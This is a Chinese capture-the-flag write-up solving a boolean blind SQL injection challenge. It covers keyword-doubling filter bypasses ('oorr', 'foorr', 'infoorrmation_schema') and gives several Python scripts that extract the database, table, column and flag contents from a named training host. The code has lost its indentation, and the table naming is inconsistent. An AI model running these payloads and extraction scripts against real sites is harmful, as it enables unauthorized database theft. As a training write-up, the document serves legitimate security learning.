16.认真一点
分析:
POST提交
id=1
显示Youarein................
id=0
显示Youarenotin...............
有区别就好做了,随便输入id=1pcatissocoooooooooool还是回显Youarein
说明这是字符型注入,1开头的字符串被弱类型等于1,输入id=1'显示Youarenotin,就庆幸了,因为说明单引号没被转义(若是转义了,就应该显示Youarein)。这里作为一名ctfer,有
种直觉就是会有waf,于是POST提交id=1§1§使用burpuite的Intruder功能,使用单字符的字典(自己准备啊),测试下waf有哪些(这其实就是一种模糊测试)。
使用Burp suite进行模糊测试,结果为or部分sql命令都可以使用。
但是使用or命令注入失败,但是从模糊测试来看是没有屏蔽or关键字,应该是后台删去了or关键字。使用oorr进行替换,当后台删去or时,or左边的o与右边的r新形成一个or关键字。
因此可以通过判断形成的SQL语句结果结果是否为1确定查询内容的正确性,首先确定数据库名长度。构造id=0'oorr(length(database())=len)oorr'0判断数据库名长度。len是要确定的长度。使用burp suite进行破解,发现len=18。
然后对数据库名爆破,针对每一位数据库的字母进行爆破。以第一位为例,可以看出爆破结果为c或C。整个数据库名可以全部爆破出来。数据库名为ctf_sql_bool_blind。其中id=0'oorr((mid((user())from(y)foorr(x)))='%s')oorr'0中的foorr是为了避免删除or,在删除or后形成for。
可以通过构建相应语句爆破库中表名及列名及列中元素值。本打算先爆破数据库中表的长度,但是测试到30多位依然不通过,直接爆破表名,表应该有两个,一个为fiag,另一个为users。不知道为什么后面会有一堆-------,在本地数据库测试时只有表名。使用爆破语句,id=0'oorr((select(mid(group_concat(table_name separatoorr '@')from(x)foorr(1)))from
(infoorrmation_schema.tables)where(table_schema)='ctf_sql_bool_blind')='y')oorr'0;x为位数,y为字符。
为了方便也可以写脚本。从表名上看flag应该在表flag中。
布尔盲注脚本:
import requests
print("start")
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php "
for i in range(1,30):
key = {'id':"0'oorr(length(database())=%s)oorr'0"%i}
res = requests.post(url,data=key).text
print(i)
if str in res:
print('database length: %s'%i)
break
print("end!")
18个,然后就是爆数据库名
import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]._"
database = ''
print('start')
for i in range(1,19):
for j in guess:
key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" %(i,j)}
res = requests.post(url,data=key).text
print('............%s......%s.......'%(i,j))
if str in res:
database += j
break
print(database)
print("end!")
表长度
import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
i = 1
print("start")
while True:
res = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0" % i
res = res.replace(' ',chr(0x0a))
key = {'id':res}
r = requests.post(url,data=key).text
print(i)
if str in r:
print("length: %s"%i)
break
i+=1
print("end!")
表名(这里是用@分隔开了表名,有两张表)
import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
table = ""
print("start")
for i in range(1,12):
for j in guess:
res = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
res = res.replace(' ', chr(0x0a))
key = {'id':res}
r = requests.post(url,data=key).text
print(i)
if str in r:
table += j
break
print(table)
print("end!")
列宽
import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
i = 1
print("start")
while True:
res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='')oorr'0"%i
res = res.replace(' ',chr(0x0a))
key = {'id':res}
r = requests.post(url,data=key).text
print(i)
if str in r:
print("length: %s"%i)
break
i += 1
print("end!")
列名
import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
column = ""
print("start")
for i in range(1,6):
for j in guess:
res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i,j)
res = res.replace(' ',chr(0x0a))
key = {'id':res}
r = requests.post(url,data=key).text
print("......%s.........%s........."%(i,j))
if str in r:
column+=j
break
print(column)
print("end!")
很明显,flag表flag列,dump一下就行了
import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
flag = ""
print("start")
for i in range(1,20):
for j in guess:
res = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i,j)
res = res.replace(' ',chr(0x0a))
key = {'id':res}
r = requests.post(url,data=key).text
'print("........%s..........%s........"%(i,j))'
if str in r:
flag+=j
print(flag)
break
print(flag)
print("end!")
注意这里的 减号 其实是空格,因为这一道题空格被过滤了,所以脚本中也没考虑空格。
内容来源: